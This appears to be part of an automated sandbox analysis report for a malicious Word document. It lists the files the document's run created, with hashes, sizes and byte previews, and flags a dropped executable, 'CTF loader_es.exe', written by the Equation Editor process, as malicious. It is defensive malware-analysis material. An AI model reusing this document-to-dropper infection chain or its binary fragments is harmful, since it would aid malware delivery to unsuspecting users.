                                                  Preview: . . . . . . . . . . . . .9.0.1.5.3.3.8.1. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. .:. . . . . . . . . . . . . . . . . .p.4.z.A.3.c.v.t.T.o.F.T.I.n.3.v.Z.J.l.I.D.N.p.Y.M.O.f.k.y.J.s.M.b.H.i.z.X.F.k.E._.X.b.i.e.W.d.2.k.J.A.y.b.3.L.Q.Z.N.u.T.V.a.O.l.U.I.d.C.u.5.P.m.p.a.M.l.Y.i.L.2.R.C.g. .2.0.9.6.5.5.1.2.2.0.9.6.5.5.1.2...f.H.v.W.c.h.j.b.Q.T.e.k.S.t.h.O.n.d.B.x.W.g.r.o.S.v.C.L.J.P.g.d.D.F.F.f.l.y.K.Z.q.o.q.s.X.x.J.L.E.A.V.k.c.N.D.o.T.r.N.a.W.D.m.y.j.o.U.m.Q.O.y.y.B.N.z.T.h.C.x.n.w.J.r.b.h.H.m.i.x.U.t.s.r.f.o.r.H.K.k.E.Y.H.V.l.f.t.B.e.D.j.S.i.w.G.M.l.v.r.O.M.l.e.q.Z.d.X.H.x.E.V.v.x.S.D.u.d.L.i.r.m.t.T.p.k.m.s.Z.d.Y.s.D.O.R.X.y.m.n.H.N.F.K.W.x.f.H.d.r.N.a.g.Q.G.M.j.j.i.B.U.b.R.Z.m.b.d.Y.C.M.r.e.K.a.E.E.O.l.Q.x.K.i.e.I.q.T.B.Q.G.V.R.X.q.N.Q.H.B.C.u.o.S.d.F.K.I.Q.h.X.A.G.U.y.a.n.R.p.O.v.m.M.M.U.Z.i.G.c.p.d.L.D.A.v.X.p.q.m.c.D.e.w.h.C.E.R.z.c.O.E.A.r.a.K.b.B.w.Q.R.S.C.v.t.y.l.b.R.u.M.T.u.K.k.J.K.W.k.L.K.V.K.k.D.D.h.Q.d.m.U.D.a.c.S.S.a.I.p.P.D.m.i.O.m.E.m.s.m.I.a.n.h.o.u.O.
                                                  C:\Users\user\AppData\Local\Temp\1048825.cvr
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1576
                                                  Entropy (8bit):3.4417743183760896
                                                  Encrypted:false
                                                  SSDEEP:48:LAll/H56+Rpjx4KHtKFlnL99+xxxWRb0Ga2KO93/cwm6:LA//Z6+7is4L99+xxxmYGn/m6
                                                  MD5:3E4F2F6075550D074C558371CC9CC9BD
                                                  SHA1:016C582ED7753219CF8EB9B32DEFC0414D600A62
                                                  SHA-256:E751A1D686FD0F3A015350A5CDFD234A666CA7FD8A198CD4ACA11A7E32A0062D
                                                  SHA-512:3489647347CACB06C9D3B2B34FD8D8C38E77EB2AA374DFE0E4F9F0865A67FA14C365245428E517DFBA9C2DDA8BF81B1CB5DC902190FC56ADAEB6AFD078AA3AF1
                                                  Malicious:false
                                                  Preview: MSQMx..........................g........................G.._A..k..3_A...............................................................................5......WINW........................................5...g.......;...........<...........A...........l...........................................c+..........`...........c+..N.......v...................................................................................8...S.......],..N...........<.......i*..B...........C...........F...........I.......N............+..H........+......................@...........@...........@...........@...+...........0...........:...........;....................4.......................,..........]...........]...m ..)....1..n"..........7#..........?...........................:*...,...........+..I........+..........@...........c...2kqa........................................8...$...........N...rrl7........rrl7........rrl7....8...rrl7....8...rrl7....8...rrl7........rrl7........rrl7....Q...rrl7....Q...rrl7....Q...rrl7
                                                  C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Allignright_companyprofile.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed May 5 02:30:36 2021, length=2960089, window=hide
                                                  Category:dropped
                                                  Size (bytes):2188
                                                  Entropy (8bit):4.590602032190979
                                                  Encrypted:false
                                                  SSDEEP:48:8o/XTFGq79iDn1sQh2o/XTFGq79iDn1sQ/:8o/XJGq7wn1sQh2o/XJGq7wn1sQ/
                                                  MD5:5BBBD72D10C21586DEE0CAD09ADD2B8D
                                                  SHA1:0760C3EB44A74A4F750A6C424CB4D8A04CD9EE9E
                                                  SHA-256:5A5F1A263529163165FC2CBD84E9B4548FBF329A5422EBE9EF1FC6AFC5DE4504
                                                  SHA-512:A2024E2E338C1B239C2ECB5B360246DF703C305F3F0B66C871796076079D6FAADBCEF1B3AEF04C0DDB0EE3F05126C11A78096B82170E5D0C3B08E82B4AF7DDE3
                                                  Malicious:false
                                                  Preview: L..................F.... ...T.S..{..T.S..{..0Cy._A...*-..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..*-..R.. .ALLIGN~1.DOC..j.......Q.y.Q.y*...8.....................A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Allignright_companyprofile.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.657550098584195
                                                  Encrypted:false
                                                  SSDEEP:3:M1tybVKxAl8JJjbVKxAlmX1tybVKxAlv:MTyExAGVExA0yExA1
                                                  MD5:FA26198640628CEC6D776D7BB8A4A7EB
                                                  SHA1:080BF5E7446190648986780F4D9E666D74087362
                                                  SHA-256:A3B64602BA15FFB5E8DC508D21A6BEFB4BDBBEDD8CA5014794C05002FA8023EF
                                                  SHA-512:8B3C10ABFF4F2050A7CB86542F856DB4CEF253D79BDA0301F5608519742E5C8292A4216CC58D8383AF54C716E6E7C07F5DC12B45E4F9ABB2D34501748AAFC3D5
                                                  Malicious:false
                                                  Preview: [doc]..Allignright_companyprofile.LNK=0..Allignright_companyprofile.LNK=0..[doc]..Allignright_companyprofile.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview: ..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B643QLK5ZML9R9E3HST.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\14LJSV38HUMSQNNUJ4FI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YKYB2VKZ9SALOEP6IHD.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83F00AO61JO8JVBNZZNG.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87BC13303IWXGUS4CPWO.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX9LQTWXBI1OLIGT87K1.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G8WMKAIS4RP0UU7V5CJM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KATDANGR9NGCXMK3FXBM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KNRKHEKRLNGFHX3WL0DL.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
